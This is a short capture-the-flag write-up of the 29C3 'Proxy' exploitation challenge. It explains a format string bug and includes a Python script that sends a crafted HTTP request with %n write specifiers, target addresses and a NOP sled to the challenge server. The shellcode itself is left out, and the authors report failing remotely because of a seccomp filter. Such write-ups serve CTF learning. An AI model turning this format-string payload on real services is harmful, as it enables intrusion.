29C3 CTF Exploitation 400 Proxy

Hellok and I worked on this challenge for a quite long time. We failed to solve this challenge though, we exploit the format string vulnerability successfully.

We spent a lot of time looking for methods to bypass PAM authentication and neglect the quite obvious format string vulnerability.

Let’s first look at the stack layout:

proxy_stack

We can see the pointer “format” will be overwritten in the lowest 3 bytes.

proxy_exploit2

Format string vulnerability is here.

proxy_exploit

To exploit such format string, we first get some stack address exposed using “%x” format of printf. Code for exploitation is as follows:

import socket  
import time  
import base64  
import random  
import struct

shellcode = # We tried several 71 bytes shellcode and succeeded in our local environment 

IP = "94.45.252.240"
PORT = 1024

buf = 'GET '
buf += '/'
buf += ' HTTP/1.1'
buf += 'Authorization: Basic '
authkey=base64.b64encode('n:1')
buf += authkey
buf += "a\x78\xf7\xff\xbf\x79\xf7\xff\xbf\x7a\xf7\xff\xbf\x7b\xf7\xff\xbf"
buf += "\x90"*250
buf += shellcode
buf += "\x90"*50
buf += "%117x%165$n%253x%166$n%10x%167$n%192x%168$n"
buf += "." * (508-len(buf))
buf += "\x94\xf5"
print "*****************"
print "buf len = ", len(authkey)
print "buf len = ", len(buf)

s = socket.socket()
s.connect((IP, PORT))
s.send(buf)
print s.recv(10000)

We didn’t understand SECCOMP_FILTER well so we failed to execute shellcode in remote server. According to other writeups, we know that the key is hided in the cache which can be easily captured using “%s” format of printf.